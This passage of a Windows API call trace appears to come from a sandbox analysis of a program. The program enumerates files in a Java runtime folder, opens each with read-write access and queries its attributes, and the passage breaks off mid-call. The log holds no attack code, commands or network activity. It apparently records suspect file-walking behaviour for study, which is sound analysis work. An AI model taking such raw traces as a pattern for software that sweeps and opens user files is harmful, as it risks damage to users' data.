lpWideCharStr=0x6e470, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll") returned 63 [0091.144] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaaccessbridge-64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.144] GetFileType (hFile=0x360) returned 0x1 [0091.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0091.144] CloseHandle (hObject=0x360) returned 1 [0091.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0091.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0091.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0091.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0091.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0091.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0091.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0091.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0091.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0091.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0091.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0091.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0091.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0091.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0091.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0091.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0091.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0091.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0091.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0091.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0091.145] AreFileApisANSI () returned 1 [0091.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0091.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6df20 [0091.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll") returned 63 [0091.146] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaaccessbridge-64.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x22c40)) returned 1 [0091.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0091.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0091.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0091.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.146] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2dc00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="javacpl.cpl", cAlternateFileName="")) returned 1 [0091.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0091.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0091.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0091.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0091.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0091.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0091.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0091.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0091.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0091.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0091.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0091.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0091.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0091.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.147] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0091.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.147] AreFileApisANSI () returned 1 [0091.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl", lpUsedDefaultChar=0x0) returned 51 [0091.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0091.147] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.147] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0091.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0091.147] AreFileApisANSI () returned 1 [0091.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0091.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x465f8 [0091.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x465f8, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl") returned 51 [0091.147] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.cpl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.147] GetFileType (hFile=0x360) returned 0x1 [0091.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0091.147] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.148] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.148] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.148] CloseHandle (hObject=0x360) returned 1 [0091.148] AreFileApisANSI () returned 1 [0091.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0091.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x460b8 [0091.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl") returned 51 [0091.148] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.cpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.148] GetFileType (hFile=0x360) returned 0x1 [0091.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0091.148] CloseHandle (hObject=0x360) returned 1 [0091.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.150] AreFileApisANSI () returned 1 [0091.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0091.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46ac8 [0091.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x46ac8, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl") returned 51 [0091.150] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.cpl" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.cpl"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2dc00)) returned 1 [0091.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0091.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0091.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0091.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0091.150] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.150] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.150] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x13a40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="javacpl.exe", cAlternateFileName="")) returned 1 [0091.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0091.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0091.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0091.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0091.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0091.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0091.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0091.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0091.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0091.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0091.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0091.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0091.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0091.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0091.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.151] AreFileApisANSI () returned 1 [0091.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe", lpUsedDefaultChar=0x0) returned 51 [0091.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0091.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0091.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0091.151] AreFileApisANSI () returned 1 [0091.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0091.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46438 [0091.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x46438, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe") returned 51 [0091.151] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\javacpl.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javacpl.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.151] GetFileType (hFile=0x360) returned 0x1 [0091.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46438 | out: hHeap=0x20000) returned 1 [0091.152] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.152] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.152] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: 